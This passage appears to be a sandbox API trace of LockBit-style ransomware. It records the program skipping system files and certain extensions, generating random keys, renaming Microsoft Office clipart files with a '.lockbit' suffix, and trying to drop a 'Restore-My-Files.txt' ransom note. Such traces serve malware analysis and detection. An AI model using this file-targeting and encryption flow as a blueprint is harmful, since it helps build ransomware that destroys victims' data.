(lpString1=".msi", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.197] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.197] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00352_.WMF") returned -1 [0175.198] lstrcmpiW (lpString1="ntldr", lpString2="SO00352_.WMF") returned -1 [0175.198] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00352_.WMF") returned -1 [0175.198] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00352_.WMF") returned -1 [0175.198] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00352_.WMF") returned -1 [0175.198] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00352_.WMF") returned 1 [0175.198] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00352_.WMF") returned -1 [0175.198] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.198] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF") returned=".WMF" [0175.198] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.198] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.199] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.199] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.200] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.200] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.200] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.200] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.200] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.200] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.200] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF.lockbit") returned 72 [0175.200] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00352_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0175.204] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.204] malloc (_Size=0x40068) returned 0x3d70450 [0175.205] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=37708) returned 1 [0175.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0175.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0175.206] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.208] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.208] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.209] free (_Block=0x1fa2ed8) [0175.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.209] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.210] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.210] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30533400, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x30533400, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1948, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00364_.WMF", cAlternateFileName="")) returned 1 [0175.210] lstrcmpiW (lpString1=".", lpString2="SO00364_.WMF") returned -1 [0175.210] lstrcmpiW (lpString1="..", lpString2="SO00364_.WMF") returned -1 [0175.210] PathFindExtensionW (pszPath="SO00364_.WMF") returned=".WMF" [0175.210] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.210] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.211] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.211] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.212] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00364_.WMF") returned -1 [0175.212] lstrcmpiW (lpString1="ntldr", lpString2="SO00364_.WMF") returned -1 [0175.212] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00364_.WMF") returned -1 [0175.212] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00364_.WMF") returned -1 [0175.212] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00364_.WMF") returned -1 [0175.212] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00364_.WMF") returned 1 [0175.212] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00364_.WMF") returned -1 [0175.212] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.213] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00364_.WMF") returned=".WMF" [0175.213] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.213] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.213] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.214] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.214] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00364_.WMF.lockbit") returned 72 [0175.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00364_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00364_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.215] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.215] malloc (_Size=0x40068) returned 0x3f70048 [0175.215] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=6472) returned 1 [0175.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0175.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0175.217] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0175.221] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00364_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00364_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.222] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.222] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.223] free (_Block=0x1fa2ed8) [0175.223] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00364_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.223] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.223] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.223] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31846100, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x31846100, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x51ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00367_.WMF", cAlternateFileName="")) returned 1 [0175.223] lstrcmpiW (lpString1=".", lpString2="SO00367_.WMF") returned -1 [0175.223] lstrcmpiW (lpString1="..", lpString2="SO00367_.WMF") returned -1 [0175.223] PathFindExtensionW (pszPath="SO00367_.WMF") returned=".WMF" [0175.224] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.224] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.225] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.225] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00367_.WMF") returned -1 [0175.226] lstrcmpiW (lpString1="ntldr", lpString2="SO00367_.WMF") returned -1 [0175.226] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00367_.WMF") returned -1 [0175.226] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00367_.WMF") returned -1 [0175.226] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00367_.WMF") returned -1 [0175.226] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00367_.WMF") returned 1 [0175.226] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00367_.WMF") returned -1 [0175.226] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.226] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF") returned=".WMF" [0175.226] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.226] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.226] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.227] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.228] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.228] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.228] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.228] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.228] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.228] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.228] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF.lockbit") returned 72 [0175.228] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00367_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc 